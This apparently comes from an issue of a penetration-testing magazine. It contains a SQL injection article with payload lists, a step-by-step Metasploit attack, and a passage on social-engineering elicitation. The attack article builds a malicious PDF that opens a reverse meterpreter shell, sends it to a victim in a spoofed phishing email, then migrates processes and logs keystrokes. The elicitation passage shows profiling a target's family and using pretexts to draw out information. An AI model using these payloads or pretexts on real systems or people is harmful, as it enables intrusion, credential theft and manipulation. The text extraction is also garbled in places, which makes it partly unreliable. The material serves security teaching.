WHERE SQL command into a two-component clause.
SELECT * FROM sensitivedata WHERE PCategory=’CCnumbers’ The ‘x’=’x’ part guarantees to be true regardless of
or ‘a’=’a’ what the first part contains.
This query will allow the attacker to bypass the login
It should return the same result. form without a valid username or password.
Again, depending on the type of backend SQL server
you are dealing with is you may have to try some Schema Mapping
additional syntax, such as: Figuring out the database schema can be difficult, so
the best solution is to guess. To guess table names we
‘ or ‘a’=’a can use something like in Listing 4. If we get a server
„ or „a”=”a error, it means our SQL is malformed and a syntax error
‘) or (‘a’=’a was thrown. It’s most likely due to a bad table name.
1’1 If we get any kind of valid response, we guessed the
1 AND 1=1 name correctly.
1’ AND 1=(SELECT COUNT(*) FROM tablenames); --
%31%27%20%4F%52%20%27%31%27%3D%27%31 Blind SQL Injection
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects Blind SQL Injection is a little more complicated than
WHERE xtype = ‘U’ – the typical error based SQL Injection attacks. To
1’ AND non_existant_table = ‘1 demonstrate a Blind SQL Injection attack I will begin by
‘ or 1=1-- using our example again with a slight variation:
„ or 1=1--
or 1=1-- http://somesite.com/home.asp?id=3 and 1=1

A good resource for additional statements is the When this is executed against our web page, we see
website http://ha.ckers.org, which maintains a large normal web page content and everything looks normal.
SQL Injection cheat sheet that is extremely helpful. This URL request is always true, as I mentioned earlier
1 always equals 1, so the web page should load
Another Example of a SQL Injection Attack normally and display expected content. To test for
Here is a very simple HTML form with inputs login and Blind SQL injection then when we want to change our
password. URL to this:

<form method=”post” action=”http:// www.somesite.com http://www.somesite.com/home.php?id=5 and 1=2


/login.asp”>
<input name=”tfUName” type=”text” id=”tfUName”> Now we want to take a look at the web page that is
<input name=”tfUPass” type=”password” id=”tfUPass”> returned. If any of the content is missing on returned
</form> page then we can assume the web page is likely
vulnerable to Blind SQL Injection. A result with missing
The easiest way for the login.asp to work is by building content is a clue that Blind SQL Injection is possible
a database query that looks like this: and using some creativity we can put together some
SQL queries that evaluate to true or false depending
SELECT id FROM logins WHERE username = ‘$username’ on the contents of another column or table outside of
AND password = ‘$password’ the SELECT statement’s column list.

THE BEST OF 01/2012 Page 42 http://pentestmag.com


Tools the necessity of scanning custom web applications.
All you NEED to perform SQL Injection is a web The general misconception is these custom web
browser and internet connection, however for large applications are not vulnerable to hacking attacks.
engagements this isn’t always the most efficient tactic. This arises more out of the it can never happen to me
This is where tools come in handy. phenomenon and the confidence website owners place
in their developers.
Sqlmap It is critical to understand that custom web applications
Sqlmap is my personal favorite and can be found here, are probably the most vulnerable and will definitely
http://sqlmap.sourceforge.net/. Sqlmap supports a large attract the greatest number of attackers simply because
variety of backend databases, automatic password hash there is the possibility that home-grown applications did
cracking, database enumeration, and tons of additional not pass through significant, if any, quality assurance
stuff. And the best part is it’s free. testing.
This means that scanning a custom web application
SQL Power Injector with only a signature-based scanner will not pinpoint
SQL Power Injector which is designed to find and vulnerabilities to SQL Injection and any other hacking
exploit SQL Injection vulnerabilities through use of techniques. Establishing and testing against a database
automated injections, and can be found here http:// of signatures of vulnerabilities for known applications is
www.sqlpowerinjector.com/. SQL Power Injector works not enough. This is passive auditing because it will only
well but is not for the SQL Injection newbie. cover off-the-shelf.
In addition, signature matching would do little when
SQL Inject Me a hacker launches an SQL Injection attack on your
SQL Inject Me is a Firefox add-on that will attempt to custom web applications. Hack attacks are not based
exploit any web page you point it at. While it is pretty on signature file testing – hackers understand that
convenient to have a SQL Injection tool built right into known applications, systems and servers are being
your browser, usability is pretty low as is reliability. updated and secured constantly and consistently by
However it is still a fun tool to play with. respective vendors. It is custom applications that are
Checking for SQL Injection vulnerabilities involves the proverbial honey pot.
auditing your website and web applications. Manual It is only a handful of products that deploy rigorous and
vulnerability auditing is complex and very time- heuristic technologies to identify the real threats. True
consuming. It also demands a high-level of expertise automated web vulnerability scanning almost entirely
and the ability to keep track of considerable volumes depends on how well your site is crawled to establish
of code and of all the latest trends and attacks that are its structure and various components and links, and (b)
currently available. on the ability of the scanner to leverage intelligently the
Another easy option to check a web application various hacking methods and techniques against your
for SQL injection vulnerabilities is by using a web web applications.
application vulnerability scanner. An automated web It would be useless to detect the known vulnerabilities
vulnerability scanner crawls the website looking for of known applications alone. A significant degree of
application to check for vulnerabilities to SQL Injection heuristics is involved in detecting vulnerabilities since
attacks. It will indicate which URLs and applications attackers are extremely creative.
are vulnerable to SQL injection so that you can further
investigate, report, and remediate. Defense against SQL Injection attacks
Even though SQL Injection is one of the most common
Signature Matching versus Heuristic Scanning for application layer attacks currently being used it is
SQL Injection relatively easy to protect against.
Whereas many organizations understand the need for Whether an attacker is able to see the data stored
automating and regular web auditing, few appreciate on the backend database or not, really depends on

Listing 4. Schema mapping

SELECT * FROM table WHERE email = 'test' AND 1=(SELECT COUNT(*) FROM table); --';

THE BEST OF 01/2012 Page 43 http://pentestmag.com


PENTEST REGULAR
how your website is coded to display the results of • Application firewalls and similar intrusion detection
the queries sent by the application. What is certain mechanisms provide a little defense against full-
is that if the attacker is able to execute arbitrary SQL scale web attacks.
Commands on the vulnerable system, they will be able • IDS: Known SQL Injection syntax can be
to compromise it. indentified and used to alert security admini-
There is a significant chance that the web applications strators
you are testing will be vulnerable to a SQL Injection Attack. • Application Firewalls: White listing expected web
Though, due to the fact most of us don’t write the code application input strings can be used to restrict
used on web applications we are testing, and in many SQL Injection. This is especially useful when
cases aren’t given the code to review, it can be extremely code review or remediation is not available.
difficult to know which web applications are vulnerable to • Server and database patching is critical but will
SQL Injection. If improperly coded, the risk of having your not provide a significant defense against SQL
data compromised is significantly increased. Injection attacks.
What an attacker gains access to also depends on
the level of security set by the backend database. The Summary
database could be set to restrict to a specific subset of Through SQL Injection an attacker is able to inject SQL
commands. Read only restrictions are common but still commands. This is equivalent to handing the attacker
do not necessarily protect the confidentiality of the data. your database and allowing him to execute any SQL
Even if an attacker is not able to modify the system, he command he wishes, possibly resulting in the loss of
would still be able to read sensitive information. the entire CIA Triad. An attacker can gain unauthorized
Protecting the web applications from SQL Injection, access by bypassing authentication, alter the data,
like most vulnerabilities, relies on Defense In Depth: or simply remove the data or shutdown the system
housing the data.
• Analyzing the state of security by performing a An attacker may execute arbitrary SQL statements
vulnerability assessment or pentest and regularly on the vulnerable system. This may compromise
performing them after changes are made to the the integrity of your database and expose sensitive
infrastructure. information. Depending on the back-end database
• Web applications need to be developed using best in use, SQL injection vulnerabilities lead to varying
practice techniques. levels of data/system access for the attacker. It may be
• Sanitize Input: As far as possible use and allow possible to manipulate existing queries, to UNION (used
only alpha-numeric. If there is a need to include to select related information from two tables) arbitrary
punctuation marks of any kind, convert them by data, use subselects, or append additional queries. In
HTML Encoding. some cases, it may also be possible to execute stored
• Prepared Statements: Send precompiled SQL procedures, or to execute shell commands on the
statements with one or more parameters. underlying operating system.
Parameter place holders in a prepared statement Unfortunately the impact of SQL Injection, like many
are represented by the ? and are called bind security vulnerabilities, is only fully understood after a
variables. Prepared statements are typically successful attack has been discovered. Data is being
immune to SQL Injection attacks as the backend unwittingly stolen through various hack attacks all the
database will use the value of the bind variable time. The more expert of hackers rarely get caught.
exclusively and not interpret the contents of the
variable in any other way.
• Use Least Privilege: Give an application user the
specific bare minimum rights on the database
server it needs. Restrict the application user from
permissions to access system stored procedures. CHRISTOPHER PAYNE
• Custom Errors: Return SQL Query errors Christopher Payne, has held numerous positions in the
with custom non-descript responses. By not Information Technology and Information Security �elds
revealing any information in error codes you over the last decade. Christopher currently works as an
can make it much more difficult for attackers to Information Security Engineer, Adjunct Professor, President
map your schema. Default error reporting for of the Grand Rapids ISSA, and the co-founder of GrrCON. Chris
some frameworks includes developer debugging has been featured by many regional television, radio and print
information. organizations and maintains a myriad of certi�cations.

THE BEST OF 01/2012 Page 44 http://pentestmag.com


������������������������������
���������������������������������

������� ��������
������������� �������������

������������������������������������� ��������������������������������������
��������������������������������� ����������
���������������� ���������������������������
� � �������������������������� ��������������������������������������
��� �������������������

��������������������������������� ������������������������������������
������������������������������������� ������
������������ ����������������������������
� � ������������������������������� ������������������������� ���
���������������������������

������������������
������������������������������������������������������������������������������������������������������������
�����������������������������������������������������������������������������������������������������������������
�������������������������������������������������������������������������������������������������
THE BEST OF 01/2012 Page
���� ���������� �����
PENTEST REGULAR

Hi!
I hacked your computer

With every passing day, with each new software, hackers around
the world start looking for vulnerabilities and write exploit codes
for them. Patching those vulnerabilities takes a lot of time and
by then the systems have been compromised. As an attacker,
there are many ways to compromise the client side systems, my
preferred method involves social engineering.

I
magine you receive a PDF attachment from a friend or crafted request, an attacker can cause arbitrary code
a colleague, you open it and you get an Figure 2 PDF execution resulting in a loss of integrity.
attachments because the file maybe damaged or not
created properly. Your first thought is that the source may Classi�cation
not be good, you run it through antivirus and it shows the Location: Remote / Network Access
file is clean; this gives you the feeling of safety. Attack Type: Input Manipulation
You now click ok to continue with your tasks to ask Impact: Loss of Integrity
your IT for help for to try something else. Solution: Upgrade
You didn’t realize that you just got owned! Exploit: Exploit Public, Exploit Commercial
In a traditional scenario, an attacker would do Disclosure: OSVDB Verified, Vendor Verified
dumpster diving and get emails and other printouts to
get some information about you. Scenario
I feel there are better ways to get such information For our demonstration we will talk about how the said
and that’s where the art of social engineering comes in. Social Engineering will be done to extract the required
Many a times I have used social engineering techniques information. First we choose a victim, then we do go
to prove that anything can be done if you know how to to their website and search the careers section for the
talk your way through it. In our scenario our attacker has available IT Jobs of the company to find out what jobs
been doing a lot of information gathering using tools such are vacant, their individual descriptions will give us the
as the (MetaSploit Framework), (Maltego) and other tools information about various software technologies in use.
to gather email addresses and information to launch a Getting a brief idea, we can then search major
social engineering client side attack on the victim. vendor’s websites for their testimonials or clients. Every
vendor displays its client list on its website proudly to
Vulnerability show credibility and to have major organizations vouch
Description for their quality and work.
A remote overflow exists in Adobe Reader and Adobe A call to these vendors posing as a large organization,
Acrobat. The document reader fails to properly bounds spoofing your caller id to reflect the same and talking
check input to the util.printf() javascript function to them, we can ask them to tell us about the victim
resulting in a stack-based overflow. With a specially company, saying we have worked with them before,

THE BEST OF 01/2012 Page 46 http://pentestmag.com


we like the products you gave to them, and would like mail id is in the victim’s hierarchy the better it is for the
to have the same products for us. Or it can be saying attacker.
that we have seen your client list and are not sure if After a successful Social Engineering session and
we can trust them saying you are new to this region scraping for emails from the web, you have gained two
etc. Have the vendor give you the email address of the key pieces of information.
IT contact they have in the company so you can ask
them personally about the vendor’s claim of excellent • They use XYZ Computers for technical services.
services. Most vendors will oblige to this thinking it will • The IT Dept has an email address of
be good for this business. The higher the owner of the itdept@victim.com

Listing 1. Creating malicious PDF �le

msf > use exploit/windows/fileformat/adobe_utilprintf


msf exploit(adobe_utilprintf) > set FILENAME XYZComputers-UpgradeInstructions.pdf
FILENAME => XYZComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(adobe_utilprintf) > set LPORT 4455
LPORT => 4455
msf exploit(adobe_utilprintf) > show options

Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME XYZComputers-UpgradeInstructions.pdf yes The file name.
OUTPUTPATH /pentest/exploits/framework3/data/exploits yes The location of the file.

Payload options (windows/meterpreter/reverse_tcp):


Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.8.128 yes The local address
LPORT 4455 yes The local port

Exploit target:
Id Name
-- ----
0 Adobe Reader v8.1.2 (Windows XP SP3 English)

Listing 2. PDF �le created

msf exploit(adobe_utilprintf) > exploit

[*] Handler binding to LHOST 0.0.0.0


[*] Started reverse handler
[*] Creating 'XYZComputers-UpgradeInstructions.pdf' file...
[*] Generated output file /pentest/exploits/framework3/data/exploits/XYZComputers-UpgradeInstructions.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_utilprintf) >

THE BEST OF 01/2012 Page 47 http://pentestmag.com


PENTEST REGULAR
Now what? After we are loaded we want to create a malicious
We want to gain shell on the IT Departments computer PDF that will give the victim a sense of security in
and run a key logger to gain passwords, intel about opening it. To do that, it must appear legit, have a title
possible confidential things in use or any other juicy that is realistic, and not be flagged by anti-virus or other
tidbits of info we can get our hands on. security alert software. We are going to be using the
We start off by loading our (MetaSploit Framework) Adobe Reader util.printf() JavaScript Function Stack
msfconsole. Buffer Overflow Vulnerability.

Listing 3. Setting up multi handler listener

msf > use exploit/multi/handler


msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LPORT 4455


LPORT => 4455
msf exploit(handler) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0


[*] Started reverse handler
[*] Starting the payload handler...

Listing 4. Creating hacking e-mail

root@bt:~# sendEmail -t itdept@victim.com -f techsupport@xyzcomputers.com -s 192.168.8.131 -u Important Upgrade


Instructions -a /tmp/XYZComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
– First line must be received within 60 seconds.
– End manual input with a CTRL-D on its own line.

IT Dept,

We are sending this important file to all our customers. It contains very important instructions for upgrading
and securing your software. Please read and let us know if you have any problems.

Sincerely,

XYZ Computers Tech Support


Aug 24 17:32:51 bt sendEmail[13144]: Message input complete.
Aug 24 17:32:51 bt sendEmail[13144]: Email was sent successfully!

Listing 5. What displays on the attackers machine screen...

[*] Handler binding to LHOST 0.0.0.0


[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
session[*] Meterpreter session 1 opened (192.168.8.128:4455 -> 192.168.8.130:49322)

meterpreter >

THE BEST OF 01/2012 Page 48 http://pentestmag.com


Adobe Reader is prone to stack-based buffer-overflow So we start by creating our malicious PDF file for use
vulnerability because the application fails to perform in this client side attack (Listing 1).
adequate boundary checks on user-supplied data. Once we have all the options set the way we want, we
An attacker can exploit this issue to execute arbitrary run exploit to create our malicious file (Listing 2).
code with the privileges of the user running the So we can see that our pdf file was created in a sub-
application or crash the application, denying service to directory of where we are. So lets copy it to our /tmp
legitimate users. directory so it is easier to locate later on in our exploit.

Listing 6. Further exploiting

meterpreter > ps

Process list
============

PID Name Path


--- ---- ----
852 taskeng.exe C:\Windows\system32\taskeng.exe
1308 Dwm.exe C:\Windows\system32\Dwm.exe

2184 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe


2196 VMwareUser.exe C:\Program FilesVMware\VMware Tools\VMwareUser.exe
3176 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
3452 AcroRd32.exe C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe

meterpreter > run post/windows/manage/migrate

[*] Running module against V-MAC-XP


[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)

meterpreter > sysinfo


Computer: OFFSEC-PC
OS : Windows Vista (Build 6000, ).

meterpreter > use priv


Loading extension priv...success.

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against V-MAC-XP


[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
[*] Recording keystrokes...

root@bt:~# cat /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt


Keystroke log started at Wed Mar 23 09:18:36 -0600 2011
Support, I tried to open this file 2-3 times with no success. I even had my admin and CFO try it, but no
one can get it to open. I turned on the remote access server so you can log in to fix our problem. Our user name
is admin and password for that session is 123456. Call me when you are done. Thanks IT Dept

THE BEST OF 01/2012 Page 49 http://pentestmag.com


PENTEST REGULAR

Bibliography
• Adobe Reader Vulnerability. (n.d.). Retrieved from http://
about-threats.trendmicro.com
• Maltego. (n.d.). Retrieved from http://www.paterva.com/
web5/
• MetaSploit Framework. (n.d.). Retrieved from http://
metasploit.com/
• Exploit Source code: http://dev.metasploit.com/redmine/
projects/framework/repository/entry/modules/exploits/
windows/browser/adobe_utilprintf.rb
• CVE-2008-2992: http://cve.mitre.org/cgi-bin/cvename.cgi?
name=2008-2992
• 49520: Adobe Reader / Acrobat util.printf() Function Cra-
fted PDF File Handling Over�ow: http://osvdb.org/49520

Figure 1. PDF Virus Check Adobe but shows a greyed out window that never
reveals a PDF. The greyed out window looks like this:
Before we send the malicious file to our victim (Figur 2 Adobe Reader Vulnerability). And then, on the
we need to set up a listener to capture this reverse attacker’s machine what is revealed... (Listing 5).
connection. We will use msfconsole to set up our multi We now have a shell on their computer through a
handler listener (Listing 3). malicious PDF client side attack. Of course what would
Now that our listener is waiting to receive its malicious be wise at this point is to move the shell to a different
payload we have to deliver this payload to the victim process, so when they kill Adobe we don’t lose our
and since in our information gathering we obtained the shell. Then obtain system info, start a key logger and
email address of the IT Department we will use a handy continue exploiting the network (Listing 6).
little script called sendEmail to deliver this payload to
the victim. With a kung-fu one-liner, we can attach the Conclusion
malicious pdf, use any smtp server we want and write And that’s it, its game over for the victim. The attacker
a pretty convincing email from any address we want... can now not only get hold of sensitive information but
(Listing 4). also copy any data from the victim’s computer. This
As we can see here, the script allows us to put any vulnerability affects Adobe Acrobat and Reader 8.1.2
FROM (-f) address, any TO (-t) address, any SMTP and earlier allows remote attackers to execute arbitrary
(-s) server as well as Titles (-u) and our malicious code via a PDF file that calls the util.printf JavaScript
attachment (-a). Once we do all that and press enter we function with a crafted format string argument.
can type any message we want, then press CTRL+D
and this will send the email out to the victim. Solution
Now on the victim’s machine, our IT Department Upgrade to version 8.1.3 or higher, as it has been
employee is getting in for the day and logging into his reported to fix this vulnerability. An upgrade is required
computer to check his email. as there are no known workarounds. Or in a really bad
He sees the very important document and copies it to case, reinstall your OS.
his desktop as he always does, so he can scan this with
his favorite anti-virus program. MILIND BHARGAVA
As we can see, it passed with flying colors so our IT Milind Bhargava, (CEH), (ECSA) is in love
admin is willing to open this file to quickly implement with the �eld of Information Security, in
these very important upgrades. Clicking the file opens pursuit of his love he has completed his
CEH & ECSA certi�cations in 2010 from
EC-Council and completed IT Security
& Ethical Hacking course from Appin Noida, India. He has
worked as Head of IT for an Oil & Gas MNC in Doha, Qatar,
where his responsibilities included but were not limited to
Network Security. He believes that ethical hacking is an
addiction, which you can never master. It’s a skill which you
can control, but never stop learning more about. And so he
Figure 2. Adobe Reader not able to open continues on his quest as an eternal student.

THE BEST OF 01/2012 Page 50 http://pentestmag.com


PENTEST REGULAR

Mastering
the Behavioral Techniques for Quick Rapport and
Elicitation
There are skilled conversationalists that can induce an individual to
unwittingly divulge their deepest secrets, their closest held personal
information, and even their banking information and passwords
without being asked any direct or related questions. In today’s high
paced competitive environment individuals and companies that are
unscrupulous and obsessed with winning will go to any extreme to
achieve a competitive edge in the marketplace, including penetrating
a competitor’s computer operating system.

T
he most successful will accomplish the must practice at every opportunity. Most individuals fear
unimaginable by employing age old spy-craft rejection when attempting these skills, but you must
skills as well as technology. These master have the courage to Enter the Arena (Figure 1).
elicitors of information utilize directed, purposeful, and Today’s professionals entering the workforce bring with
well planned out conversations in order to elicit and gain them a critical and highly sought after skill set in regards
whatever information they deem of value. to technology that tends to exceed the generations prior
The first president of the United States, George to them. Likewise, the prior generations in the work
Washington, was our countries first spy master. At the force tend to have a skill set in regards to developing
onset of the war for independence, the British were quick rapport and conversations with individuals one-
occupying the city of Boston. Washington was desperate on-one. As in many situations, when you combine skill
for information in order to give him and the Americans a sets, the end result is a much better capability than
tactical edge. Washington employed a master observer each alone. Breaking down the art form of interpersonal
and elicitor, a spy, in order to gather the necessary
information on the opposing force. Instead of hacking
a computer operating system, Washington hacked a
human operating system and successfully penetrated
the British information network in Boston for $333.00.
The human hacking skills used throughout history
are now being combined with the computer network
penetration skills of today to form the most advanced
information gathering system ever known, the Social
Engineer. This article will highlight and demonstrate the
advanced social psychological skills (soft skills) used
by master Social Engineers. Developing these skills is
not difficult, it requires a desire to build upon that which
we all do every day, interact with people. The difference
is that these interactions will be with a purpose and a
plan. In order to build these skills to a mastery level, you Figure 1. The Man in the Arena

THE BEST OF 01/2012 Page 52 http://pentestmag.com


relations into a paint-by-number executable process is the internet for information related to their new client as
critical to developing these skills rapidly. well as upcoming training and conferences concerning
cyber security. Becker was aware that he had the
Background education, but desperately needed practical skills if he
Clark is a senior penetration tester (pentester) for a leading was going to succeed in his profession. Clark glanced
cyber security firm. He was recruited by the company a around Becker’s cubicle and noted that he had some
number of years ago when it was first formed because of photos of his children. The photos were facing outward
his background and expertise at developing confidential toward the aisle and prominently on display. One of the
human sources on a cyber intrusion task force for the photos was of Becker apparently coaching his young
government. Clark isn’t the most technically skilled in the son at a T-ball game. Clark smiled when he saw the
company, but he has been able to successfully highlight photo and said, Hi Becker, how are your first few weeks
the human vulnerabilities that companies have with going? Becker swiveled around in his chair and looked
startling success. Using his years of eliciting and rapport up at the smiling Clark and replied, Fine, I’m a little
building experience, Clark is able to target an individual concerned that I don’t feel like I am really contributing
in the client company, build an appropriate engagement anything significant yet. Clark continued his friendly
plan, and have a successful conversation and ongoing smile and replied, That’s ok, it takes a little time to figure
dialogue with the individual. Clark routinely is able to things out. Clark went on to apologize that it had taken
obtain technical information about the client’s computers him this long to reach out and have a chat with him. He
and operating systems, security protocols, and even offered no excuse but the humble apology.
passwords. In the rare instances when Clark doesn’t get Clark regarded the photo of Becker and his son on
the exact password, he is able to obtain the methodology his desk, smiled while angling his head slightly to the
an individual uses and most often where the passwords side and inquired, Your son? Becker immediately felt at
are stored for later retrieval. ease and went on to describe how he coaches his son’s
John Becker is a recent addition to the Company. baseball team. The two had a nice chat about what
Becker was hired a few months ago because of his Becker does with his free time with his children while
strong computer background. Becker received his
undergraduate and eventually his graduate degree in
computer science from a leading university. Becker has
always been fascinated by people as well as computers.
His research was in the area of utilizing social media
for developing personality models. Despite Becker’s
fascination with people, he has always regretted never
taking the time while in school to put his research and
interest in people into practical application. The thought
of approaching a stranger and initiating a conversation
is a daunting thought to him. What Becker doesn’t
realize is that creating conversations with strangers
is an intimidating thought to most people. Luckily for
Becker, he has been teamed with Clark, a master
rapport builder.

The Situation
One afternoon one of the company’s executives
informed Clark that they had a new client requesting a
social engineering penetration test (SE Pentest). The
client wants the company to test their people network
for human information leakage and vulnerabilities so
they are able to better tailor their training to address
the vulnerabilities discovered. Clark thought this was a
great opportunity to get his new apprentice engaged in
SE soft skill techniques.
Clark approached Becker at his desk. Becker was
sitting in his chair facing his computer screen surfing Figure 2. Clark’s simple planning guide

THE BEST OF 01/2012 Page 53 http://pentestmag.com


PENTEST REGULAR
Clark pulled up a chair and sat attentively listening to able to execute the techniques rapidly without having to
Becker play the part of the proud father discussing his strategize every word, For example. Clark asked Becker
children. About 15 minutes later when Becker exhausted for the phone number to the company. Becker provided
his conversation, Clark leaned in and asked, So are it with a quizzical look as Clark picked up the phone and
you ready to go out and do some social engineering? called the company. Clark called the company and a
Becker responded, Sure. pleasant sounding woman answered the phone. Clark
Clark went on to explain how he had just been hired added a smile while he was speaking, lowered his chin
to conduct a SE Pentest for a new client. The client angle and tilted his head slightly to the side and said
was requesting a test of the company’s people network into the phone, Hi, I’m sorry to bother you but I only
and vulnerabilities. Clark went on to explain how this have a few minutes before I have to get back to work.
typical test first starts out with identifying the types I’m embarrassed and I hope you can help. The woman
of computers and operating systems the company on the other end immediately softened her voice a little
utilizes. Becker looked at Clark with a slight grimace and asked how she can help. Clark continued, I met one
and eyebrow compression indicating a degree of stress of your managers some time ago who is in purchasing
and inquired, How are we going to do that? Clark smiled and we really had a great conversation. I offered him
broadly and replied, By using advanced rapport building assistance on one of his projects and he gave me his
techniques and elicitation; the same that the best spy business card. I was absent minded and left his card
agencies around the world use. in my shirt pocket and washed it. I’m calling because
Clark explained that the first step in the process all I can make out on the card is a partial name. I think
was to identify a human target for their SE Pentest. it is John Carter. The woman on the other end quickly
Clark also explained that different SE’s may have a corrected Clark and said that there manager in charge
different process, but one that has served him well of purchasing is Steve Smith. Clark replied with a
was to review company information and personnel chuckle, You are a life saver; the card is in such bad
in the company. Becker offered that he had already shape I was way off. I would have been lost without
been to the company’s website and there was no you. The woman gave a modest laugh and replied, I
personnel roster available, only a contact number for try, I only wish I could be as much of a help to everyone
inquiries. Clark offered that good companies like this else. The woman went on to offer his direct telephone
one do not create easy targets. Clark asked Becker, number as well as the hours that he normally is in. John
So what position or level of employee do you think again thanked her for her time and assistance before
would be the best for us to glean information from? he hung up.
Becker offered, A secretary? Clark informed him that Becker was staring at Clark in amazement when he
secretaries were generally an information windfall and hung up the phone. Becker said, That sounded like
generally underpaid and underappreciated, which such a normal conversation, but she ended up giving
lends itself to the techniques really well. Clark went on you exactly what you wanted and you never asked for it.
to describe that he thought someone around midlevel Correct, said Clark, I elicited the information by utilizing
management that was involved in purchasing might be social psychological techniques that we’ll discuss later.
good. Clark said that part of the objective was to gain Now, I need you to use that great computer social
access to the facility as well as uncover the types of networking background you have and get us as much
computers and operating systems they were using. information about Smith as you can.
Becker asked how they were going to find out who that
individual is and how to accomplish the goals. Clark Planning the Encounter
responded, Like all important missions, with a well Becker worked diligently researching Smith utilizing
thought out plan. his knowledge of social networking sites and other
Clark took a piece of paper out of his notebook and information gathering tools. There wasn’t a great deal
began writing a simple planning guide down (Figure 2). of information available, but he did determine that
Clark explained that this was the same guide he Smith is married, his home address, he is the father of
had developed when he was developing confidential a son and daughter, and he coaches his son’s baseball
human sources for the government. Becker regarded team. Becker discovered that Smith maintains a blog
the document and noted that the first section was Who? where he discusses one of his passions, coffee.
They had identified a possible job position, but they Smith is an avid coffee aficionado and describes in
needed some more details for targeting. Clark explained detail his favorite roasts as well as his favorite coffee
to Becker that once he developed his own techniques houses, including the one he frequents almost every
and built his muscle memory around them, he would be Saturday.

THE BEST OF 01/2012 Page 54 http://pentestmag.com


As the next few days passed, both Clark and Becker Following a few more minutes of discussion Clark
were reading Smith’s blog, gaining greater insight into held up his finger and said, Let’s get another opinion on
Smith’s interests and hobbies. Smith appeared to be the topic. Clark leaned back a little and spoke over his
extremely knowledgeable and very direct with a quick shoulder and stated to the coffee sipping Smith, Good
wit and mind for observation. He also appeared to morning, I’m very sorry to interrupt you. My friend and
be very genuine in his desire to help others and be a I are getting ready leave but were hoping you could
good husband, father, and employee. Clark devised the help us settle a discussion we are having and ask
meeting engagement plan with Becker’s input. Becker your opinion. Smith regarded them, noticed that they
was a bit surprised about the simplicity of the plan and had finished their coffee and said with a slight eyebrow
also a bit disappointed that his role was mostly listening furrow, Ok, what is your question? Clark replied, My
and observing. Clark assured him that it was because friend has teenage children. We were discussing what
he needed Becker to observe so they could have a an appropriate age is to allow kids to start dating. My
productive after action review. The best advice that friend says 16 and I say if I had a daughter it would
Clark gave Becker as they departed was to Be yourself, be 30. What are your thoughts? Smith gave a broad
if you are anything else people can see right through it smile and gave a slight chuckle as he replied, I have
and you just end up looking fake. Clark also told Becker teenagers as well. Clark quickly added, Ah, we have an
to subdue his natural desire to chat too much and that expert. Smith laughed again and offered, Hardly, but my
he would prompt him when the time was right. Becker wife and I both think that 14 is a good age to begin a
didn’t quite understand but agreed. dialogue about it with our kids and assess their maturity
The plan was for Clark to be a computer printer sales level. Smith went on to say that he plans on requiring
representative and that Becker would be a service his daughter to bring her proposed boyfriend to dinner
technician. Clark had utilized this type of pretext many at their house before she is allowed to date him. Clark
times in the past and found it to be very effective. Clark could tell from Becker’s nonverbal demeanor that he
reminded Becker to listen closely and follow his lead didn’t totally agree with Smith. As Becker was about
during any conversation that ensued. Clark was going to say something in response to Smith, Clark quickly
to attempt to first build rapport with Smith, and then looked at him and shook his head. Becker took the cue
hopefully broker an invitation to look at Smith’s printers and held his opinion. Clark then replied to Smith with
at his place of employment. one simple word, Dinner? Smith went on to describe
Clark and Becker headed out to where they new Smith that the purpose of the dinner was to get to know the
went almost every Saturday morning for his coffee. boy a bit better. Also, he figures if any boy is brave
From his blog, they knew that he enjoyed reading the enough to sit through a family dinner with his potential
newspaper while he sampled a new coffee blend. While girlfriend’s family that was a good sign. Both Clark
driving, Clark further explained to Becker that these and Becker nodded in agreement. Clark commended
operations sometimes take some time because they Smith for a great idea and pledged to incorporate it into
have to wait for the perfect opportunity to engage the his own life when he has children. Smith returned the
target in a way that seems innocuous to the target. compliment with a broad smile.
Once at the coffee shop, Clark and Becker ordered Smith took a long sip from his coffee and appeared
their coffee’s and waited and hoped that Smith would to be truly savoring both the taste and aroma. Clark
arrive this Saturday morning. Finally, a few hours later took the opportunity to begin his elicitation plan. Clark
Smith did arrive. Clark and Becker recognized him took a sip of his own coffee and stated, I’m guessing
from his Facebook photos. Clark smiled at Becker and by how thoroughly you are enjoying that coffee that
said, Remember, follow my lead. Becker nodded and you must make a living as a world renowned coffee
watched his mentor prepare for action. critic. Smith smiled at the compliment and humbly
Smith purchased a coffee and took a seat at a table close offered, Hardly, I’m just a simple mid level purchasing
to Clark and Becker. As Smith sat down and unfolded a manager at a company not too far from here. Clark
newspaper to read, Clark asked Becker, Regarding your replied with an inquisitive look, Purchasing manager?
children, what do you think is an appropriate age for kids Smith felt compelled to elaborate, Yes, I handle all of
to start dating at? Becker looked at Clark quizzically. Clark the equipment purchasing and maintenance for our
merely gave him a nod and a blink of an eye. Becker company. Clark continued to look at Smith in silence for
smiled and said, That’s a tough question, my wife and I a second or two and Smith filled the silence with, I am
think we are going to set the age at 16 for our kids. The in charge of ensuring all of our companies computers,
two began having a fun discussion reminiscing about software, printers, and furniture are maintained and
when they began dating in their teenage years. updated when needed.

THE BEST OF 01/2012 Page 55 http://pentestmag.com


PENTEST REGULAR
Smith politely inquired what Clark and Becker did for a great conversation, new friendship and potentially
